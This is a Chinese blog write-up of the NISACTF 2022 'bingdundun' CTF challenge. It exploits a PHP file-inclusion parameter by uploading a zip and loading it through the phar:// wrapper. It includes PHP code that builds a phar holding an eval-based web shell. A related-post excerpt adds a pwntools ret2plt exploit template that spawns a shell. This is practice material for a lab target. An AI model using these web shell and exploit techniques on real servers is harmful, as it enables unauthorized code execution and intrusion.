[NISACTF 2022]bingdundun

已于 2022-11-07 15:20:46 修改
阅读量1.8k 收藏 2
点赞数 1
分类专栏: CTF WEB 文章标签: 安全 web安全
于 2022-10-19 13:57:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jhk8698/article/details/127406643
版权
本文详细描述了一次利用PHP文件上传和文件包含漏洞进行攻击的过程。作者首先发现了一个URL参数可以改变,尝试注入后成功触发了文件包含。接着,通过创建包含PHP代码的ZIP文件并利用phar协议,成功执行了代码,获取了flag。文章提供了两种不同的方法来获取flag,并介绍了如何构造和利用phar文件。整个过程展示了Web安全中常见的文件上传漏洞利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 进入靶场环境,提示upload,应该是一个文件上传与文件包含相关的题目。

2. 点击upload进入文件上传页面。看到url有一个bingdundun的get传参,我们尝试传入其他值尝试一下。

3. 尝试传入index,发现index页面的内容被大量包含进来,并且会自动在后面添加.php

4. 在看文件上传点提示可以传图片或压缩包,因此考虑php伪协议中的phar协议或zip协议。首先写一个phpinfo()脚本,打成zip压缩包并上传,上传成功后利用phar协议包含压缩包中的脚本文件,发现脚本中的php代码被成功包含进来并被当作代码执行了。

获取flag方法

方法一:

利用phar协议读取上传一句话木马,用菜刀链接。

http://1.14.71.254:28884/?bingdundun=phar://23de81832e6ba264115a6192202105f7.zip/reqma

方法二:

构造phar文件,phar文件包含我们想要执行的代码,由于index页面提示,flag就在根目录下,因此如果能直接执行cat /flag 就能出结果了。

构造phar文件方法

  1. 修改php.ini 让phar.readonly 改成off。
  2. 创建一个pharfile.php文件,代码如下,用于生成phar包
<?php
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->addFromString("pharfile.php", '<?php eval($_REQUEST["ps"]);?>');
$phar->stopBuffering();
?>

3. 浏览器访问该文件,在同目录下会生成exp.phar文件。复制一份改成zip格式,然后上传

4. phar://协议将文件包含到当前页面,然后给ps参数传入想要执行的代码值,执行成功。

5. 根据代码提示flag在根目录下,因此构造url得到flag。

[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 761
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
关于[NISACTF 2022]babyserialize详解
weixin_57222016的博客
05-06 2565
前言 先甩出PHP的魔术方法。 __invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法 __construst():具有构造函数的类在创建新对象的时候,回调此方法 __destruct():反序列化的时候,或者对象销毁的时候调用 __wakeup():反序列化的时候调用 __sleep():序列化的时候调用 __toString():把类当成字符串的时候调用,一般在echo处生效 __set():在给不可访问的(protected或者private)或者不存在的属性赋的时候,会被调用
[NISACTF 2022]bingdundun~
m0_73612768的博客
01-05 942
用 phar 伪协议进行文件包含;
[NISACTF 2022]
snowlyzz的博客
09-09 6446
NISACTF部分WP
NISACTF 2022 MISC 部分WP
qq_51447967的博客
04-28 2545
[NISACTF 2022]bilala的二维码 题目提示如下 bilala说,里面会不会还藏着什么东西呢,图片分辨率好像有用诶,压缩包密码好像和战队名字相关 下载得到一张缺少定位符号的二维码,手动补全,然后扫描。 扫描得到一个URL,如下 https://video.gz2.com.cn/h666G/h666G_kzwIVy 进去下载得到一张图片,如下 对图片进行分析 可以看到第一张图片后面又附加了一张图片,然后第二张图片后面有个压缩包,全部提取出来。 看了下图片没有发现什么,然后去分析压
[NISACTF 2022]流量包里有个熊做题笔记及心得
2301_79424186的博客
03-19 449
这道题不难但是涉及的地方挺多的,根据SS猜到FF开头的JPG再想到rot13就体现了典型的MISC思想,虽然有更抽象的(
[NISACTF 2022]bingdundun~-wp
2302_80307588的博客
12-24 258
phar://伪协议是php解压缩报的一个函数,不管后缀是什么,都会当做压缩包来解压,用法:?file=phar://压缩包/内部文件 phar://xxx.png/shell.php 注意 PHP>=5.3.0压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。简单来说,就是我们写一个一句话木马,然后压缩成.zip,然后再用phar伪协议解压。进入题目,发现有URL传参,提示只能上传图片或者压缩包,猜测使用phar伪协议。蚁剑连接即可得到flag
[NISACTF 2022]bingdundun wp
Leaf_initial的博客
04-14 625
这里大部分人可能会报错,这个错误信息表示在运行phar.php文件时,创建归档文件“exp.phar”的功能被禁用了。由于我一直报错,不能生成文件,改了也没有用,所以找到了第二种解决办法,在php文件的目录下打开cmd,然后命令行输入。(但是不知道为什么我的phpinfo信息不能显示,于是重新上传了一个,变量名改了一下,改成了8,就可以了)可以看到example.phar压缩文件中有phar.php文件,里面有一个php代码,内容是一句话木马。连接成功,在根目录中的flag文件找到了flag,结束。
CTF实验:web安全命令执行
floyd_art的博客
04-12 1797
命令执行漏洞介绍 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。   调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。 信息探测 ...
WebNISACTF 2022 个人复现
uuzeray的博客
12-01 384
明天就新生赛了,练套题保持下手感吧(文章只选取了一部分)
文件包含漏洞详解
热门推荐
m0_55854679的博客
03-12 1万+
文章目录File Inclusion(文件包含)概述漏洞产生原因漏洞特点注小知识文件包含函数includerequireinclude_oncerequire_once文件包含示例pikachu靶场本地文件包含漏洞演示pikachu靶场远程文件包含漏洞演示文件包含漏洞的利用PHP伪协议(文件包含漏洞常用的利用方法)文件包含漏洞的防范措施phpMyadmin靶场练习 File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件
一文掌握CTF中Python全部考点
黑战士的博客
07-22 3009
pyc文件是py文件编译后生成的字节码文件(byte code),pyc文件经过python解释器最终会生成机器码运行。因此pyc文件是可以跨平台部署的,类似Java的.class文件,一般py文件改变后,都会重新生成pyc文件。
CTF夺旗 服务安全FTP服务
qq_43613772的博客
06-05 878
FTB的简介: FTP 是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:“下载”(Download)和"上传"(Uploa...
pie保护 pwn 例题
最新发布
01-06
### 关于PIE保护机制下的PWN攻击实例 在存在位置无关可执行文件(Position Independent Executable, PIE)的情况下,程序加载地址会在每次运行时被随机化。这增加了利用漏洞的难度,因为传统的返回导向编程(ROP)依赖固定的基址来计算目标函数或gadget的位置。 然而,在某些情况下仍然可以实施有效的攻击策略。例如,在未完全启用RELRO的部分程序中可能存在动态链接表(Global Offset Table, GOT)条目重写的机会[^1]。对于这类情形,可以通过泄露库函数的实际地址并结合偏移量找到系统调用或其他有用功能的确切位置。 当面对开启了PIE但其他安全措施较弱的目标时,一种常见的方法是通过信息泄漏获取当前映像基址,之后再构建针对特定版本二进制文件已知布局的payload来进行控制转移。下面给出一个基于`ret2plt`技巧的具体案例分析: #### 实战演练:CTF挑战题目的解析 考虑一道名为“ezpie”的题目来自NISACTF 2022竞赛[^2]。此题提供了一个易受攻击的服务端应用,它虽然启用了PIE特性却未能充分设置栈溢出防护机制。这意味着如果能够绕过ASLR的影响,则有可能实现远程代码执行。 为了完成这一任务,选手们通常会采取如下手段之一: - 利用格式字符串错误读取内存中的关键数据片段; - 或者借助UAF (Use After Free) 缺陷间接访问已经释放的对象结构体成员变量; 无论哪种方式获得的信息都可以帮助定位libc.so及其他重要模块的真实起始点,从而为进一步规划rop chain奠定基础。 ```python from pwn import * # 建立连接至服务 conn = remote('target_ip', port) # 发送恶意输入触发缓冲区溢出条件... conn.sendlineafter(b'prompt:', payload) # 接收响应包内含潜在有价的指针 leaked_ptr = u64(conn.recvuntil(b'\n').strip().ljust(8,b'\x00')) log.info(f"Leaked pointer @ {hex(leaked_ptr)}") base_addr = leaked_ptr - known_offset_from_libc_base_to_leak_point system_plt = base_addr + offset_of_system_in_libc bin_sh_str = base_addr + offset_of_binsh_string_in_libc final_payload = b'A'*offset_until_retaddr \ + p64(system_plt) \ + p64(ret_gadget_if_needed) \ + p64(bin_sh_str) conn.sendline(final_payload) conn.interactive() ``` 上述脚本展示了如何与远端服务器交互,并尝试构造合适的载荷以期达成命令注入的目的。当然实际操作过程中还需要根据具体情况调整细节部分如偏移量等参数设定。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值